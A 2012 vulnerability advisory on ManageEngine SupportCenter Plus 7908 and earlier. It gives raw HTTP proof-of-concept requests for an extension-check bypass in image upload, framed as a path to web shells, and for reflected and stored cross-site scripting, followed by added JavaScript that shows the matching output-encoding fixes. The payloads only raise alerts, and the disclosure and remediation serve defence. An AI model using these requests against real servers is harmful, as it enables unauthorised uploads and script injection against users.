ManageEngine Support Center Plus 7908 XSS / Shell Upload

Posted Oct 16, 2012
Authored by xistence

ManageEngine Support Center Plus versions 7908 and below suffer from multiple cross site scripting and shell upload vulnerabilities.

tags | exploit, shell, vulnerability, xss
SHA-256 | ce1d93bee37427da393ef8b2a378940e15f95dfe2266842aa8f8b6171109489a

+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : ManageEngine Support Center Plus <=7908 Multiple Vulnerabilities
# Date : 06-03-2012
# Author : xistence (xistence<[AT]>0x90.nl)
# Software link : http://www.manageengine.com/products/support-center/64045241/ManageEngine_SupportCenter_Plus_7_9_0_SP-0_8_0.ppm
# Vendor site : http://www.manageengine.com/
# Version : 7908 and lower
# Tested on : CentOS 5.x
+--------------------------------------------------------------------------------------------------------------------------------+


1) Arbitrary File Upload (File Extension Verification Bypass)

The image extension check in the ticket creation editor can be bypassed. Normally you would go to Requests -> New Request and use "Insert Image" to upload a picture for inclusion in the ticket; the editor restricts this to jpg/gif/png files. That restriction is enforced only by the editor in the browser: a POST sent directly to /jsp/UploadImage.jsp?Module=WorkOrder is stored whatever the extension, so an authenticated user can upload arbitrary files. The stored file is then served back under /inline/<Module>/<id>/<timestamp>.<ext>, which could allow web-executable content (backdoors/shells) to be placed on the server. Whether such a file is executed rather than returned as static content depends on how the servlet container maps that path; what is demonstrated here is that the upload is stored and served back unchanged.

Below is a sample POST request. Note that a valid session cookie is needed (the request must be authenticated) to perform these actions. The request uploads a file test.txt with the contents "TEST!"; the multipart part declares Content-Type: image/gif, but the filename keeps the .txt extension and the content is not an image.

POST /jsp/UploadImage.jsp?Module=WorkOrder HTTP/1.1
Host: exploitme:8080
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------135769595918512168611930018855
Content-Length: 231

-----------------------------135769595918512168611930018855
Content-Disposition: form-data; name="img_file"; filename="test.txt"
Content-Type: image/gif

TEST!

-----------------------------135769595918512168611930018855--



In the HTTP response you'll see this:

<script>var formName = parent.document.getElementById("FORMNAME").value;
var opts = parent.document.forms[formName].INLINEIMAGES.options;
var imgName = "1340090056957.txt";
var option = new Option(imgName, imgName);
option.selected = true;
opts[opts.length] = option;
// parent.showImage("WorkOrder","2","1340090056957.txt");
parent.ZE.activeEditor.previewImage("/inline/"+"WorkOrder"+"/"+"2"+"/"+"1340090056957.txt");//No i18n</script>

The upload is then reachable at the following URL, which returns "TEST!" as clear text. Note that the server generated the timestamp-based file name but kept the client-supplied extension:
http://<IP ADDRESS>:8080/inline/WorkOrder/2/1340090056957.txt


2) Reflected XSS

Proof of Concept:
http://<IP ADDRESS>:8080/HomePage.do?fromCustomer=%27;alert%28%22Hello%20World%22%29;%20var%20frompor=%27null

URL-decoded, the value of fromCustomer is ';alert("Hello World"); var frompor='null. As the shape of the payload shows, the parameter is reflected unescaped inside a single-quoted string in an inline script: the leading quote closes that string, alert() runs, and the trailing var frompor=' opens a new string so the remainder of the script stays syntactically valid.


3) Stored XSS vulnerability

How to replicate:

Requests -> New Request
Subject: anything
Description window -> select Edit HTML button -> insert script code, e.g.: <script>alert("Hello World")</script>

The resulting POST request (the description parameter carries the URL-encoded script tag, which is stored with the ticket and rendered back to anyone who views it):

POST /WorkOrder.do HTTP/1.1
Host: exploitme:8080
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 312

reqTemplate=&prodId=0&priority=2&reqID=2&usertypename=Requester&reqName=Guest&category=0&item=0&subCategory=0&title=bla&description=bla%3Cscript%3Ealert%28%22Hello+World%22%29%3C%2Fscript%3E&MOD_IND=WorkOrder&FORMNAME=WorkOrderForm&attach=&attPath=&component=Request&attSize=&attachments=&autoCCList=&addWO=addWO
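The following is an added example and not code from the advisory or from ManageEngine. It models the two injection contexts in sections 2 and 3, a parameter reflected into an inline JavaScript string and ticket HTML stored and rendered back, and shows the context-specific output encoding that closes each. The template shapes are assumptions inferred from the payloads, not the product's actual pages; alert() is replaced by a recording stub so the generated inline scripts can be executed here.

```javascript
// Added example (not code from the advisory or from ManageEngine). The page templates
// below are assumed shapes inferred from the payloads in sections 2 and 3.
const REFLECTED_PAYLOAD = "';alert(\"Hello World\"); var frompor='null";
const STORED_PAYLOAD = 'bla<script>alert("Hello World")</script>';

// Section 2, vulnerable: the parameter is concatenated straight into a
// single-quoted JavaScript string literal inside an inline <script>.
function renderHomePageVulnerable(fromCustomer) {
  return `var fromCustomer = '${fromCustomer}';\nvar frompor = 'null';`;
}

// Encoder for the JavaScript-string context. JSON.stringify escapes quotes,
// backslashes and control characters; '<' is escaped as well so "</script>" can
// never end the script block, and the JS line terminators U+2028/U+2029 are
// escaped so the literal cannot be broken across lines.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

function renderHomePageHardened(fromCustomer) {
  return `var fromCustomer = ${jsStringLiteral(fromCustomer)};\nvar frompor = 'null';`;
}

// Executes a generated inline script with alert() stubbed out; returns what the
// script left in fromCustomer and every message passed to alert().
function runInlineScript(script) {
  const alerts = [];
  const fn = new Function("alert", `${script}\nreturn fromCustomer;`);
  const fromCustomer = fn(msg => alerts.push(String(msg)));
  return { fromCustomer, alerts };
}

// Encoder for the HTML-body context: the five characters that can change
// markup structure.
function htmlEncode(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, c => map[c]);
}

// Section 3, vulnerable: the stored description is written into the ticket
// page as-is, so the <script> element submitted via "Edit HTML" executes for
// every viewer.
function renderDescriptionVulnerable(description) {
  return `<div class="description">${description}</div>`;
}

// Section 3, hardened for plain-text descriptions: encode on output. Where the
// rich-text editor must keep HTML, an allowlist sanitizer replaces this step.
function renderDescriptionHardened(description) {
  return `<div class="description">${htmlEncode(description)}</div>`;
}

// Demo-only check: does the rendered fragment still contain a <script> element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}
```

Encoding the whole description is the right fix only if the field is plain text; section 3 shows the vulnerability in an "Edit HTML" mode where markup is intended, and there the stored HTML has to pass through an allowlist sanitizer (for example the OWASP Java HTML Sanitizer on a Java server, or DOMPurify client-side) with script, event-handler attributes and javascript: URLs removed, backed by a Content-Security-Policy that disallows inline script. Two distinct encoders are used above because an HTML encoder does nothing for the JavaScript-string context in section 2: the single quote that breaks out of the literal is not an HTML metacharacter that browsers decode inside <script>.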

